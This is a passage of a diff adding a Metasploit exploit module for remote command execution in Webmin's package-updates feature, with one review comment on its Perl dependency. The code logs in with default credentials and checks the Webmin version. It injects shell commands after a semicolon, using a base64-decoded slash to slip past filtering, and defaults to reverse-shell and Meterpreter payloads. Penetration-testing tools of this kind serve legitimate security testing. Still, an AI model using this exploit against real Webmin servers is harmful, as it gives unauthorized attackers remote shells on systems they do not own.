modules/exploits/linux/http/webmin_package_updates_rce.rb

```diff
@@ -0,0 +1,170 @@
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res
+
+    if res.body.include?('This web server is running in SSL mode.')
+      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
+    end
+
+    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first
+
+    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version
+
+    version = Rex::Version.new(version)
+
+    vprint_status("Webmin #{version} detected")
+
+    unless version < Rex::Version.new('1.997')
+      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")
+    end
+
+    vprint_good("Webmin #{version} is a supported target")
+
+    CheckCode::Appears
+  rescue ::Rex::ConnectionError
+    return CheckCode::Unknown("#{peer} - Could not connect to web service")
+  end
+
+  def do_login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),
+      'headers' => { 'Referer' => full_uri },
+      'cookie' => 'testing=1',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD']
+      }
+    })
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302
+
+    print_good('Logged in!')
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')
+    cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"
```

Comment:
Since Webmin is a Perl application, it is safe to assume Perl is installed on the target and this should always work.